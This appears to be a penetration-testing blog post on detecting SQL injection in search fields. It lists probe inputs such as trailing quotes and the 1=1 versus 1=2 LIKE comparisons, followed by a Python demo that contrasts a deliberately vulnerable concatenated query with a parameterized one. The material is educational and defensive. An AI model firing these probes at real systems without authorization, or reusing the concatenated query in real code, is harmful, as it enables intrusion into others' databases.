congdong007

Penetration Test、Software Developer


Search-Based SQL Injection Detection

Search-Based Injection Detection Methods:

  1. Input the search keyword:

    keyword'

    If an error occurs, there’s a high probability of a vulnerability.

  2. Input the search keyword:

    keyword%'

    If an error occurs, there’s a high probability of a vulnerability.

  3. Input the search keyword:

    keyword%' and 1=1 and '%'='

    Observe the response.

  4. Input the search keyword:

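    keyword%' and 1=2 and '%'='

    Observe the response and compare it with step 3. If the 1=1 search returns the normal results and the 1=2 search returns none, the input is being evaluated as part of the SQL statement.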

Search-Based Injection Detection Statements:

    'and 1=1 and '%'='
    %' and 1=1--'
    %' and 1=1 and '%'='
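
The four inputs above, run against a constructed in-memory SQLite table, as an added example that is not from the original post: `search_concat` builds the LIKE query by string concatenation and reproduces the error, 1=1 and 1=2 behaviour the steps look for, while `search_param` binds the keyword as a parameter so every probe is treated as literal text. The table, column and function names are assumptions.

```python
import sqlite3

# Constructed sample data; table and column names are assumptions.
ROWS = [("keyword basics",), ("another keyword post",), ("unrelated",)]

# Probe inputs in the form of the page's detection statements.
PROBES = [
    "keyword",
    "keyword'",
    "keyword%'",
    "keyword%' and 1=1 and '%'='",
    "keyword%' and 1=2 and '%'='",
]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?)", ROWS)
    return db

def search_concat(db, term):
    """Vulnerable: the term is pasted between '% and %' in the SQL text."""
    sql = "SELECT title FROM articles WHERE title LIKE '%" + term + "%'"
    try:
        return len(db.execute(sql).fetchall())
    except sqlite3.Error:
        return "error"  # the database error the first two steps look for

def search_param(db, term):
    """Hardened: the term is bound as data and LIKE wildcards are escaped."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT title FROM articles WHERE title LIKE ? ESCAPE '\\'"
    return len(db.execute(sql, ("%" + escaped + "%",)).fetchall())

def run():
    """Map each probe to (concatenated result, parameterized result)."""
    db = make_db()
    return {p: (search_concat(db, p), search_param(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (weak, safe) in run().items():
        print(f"{probe!r:34} concat={weak!s:6} param={safe}")
```

With the concatenated query the 1=1 input returns the same rows as a plain `keyword` search and the 1=2 input returns none; with the bound parameter all four probes return zero rows and no error.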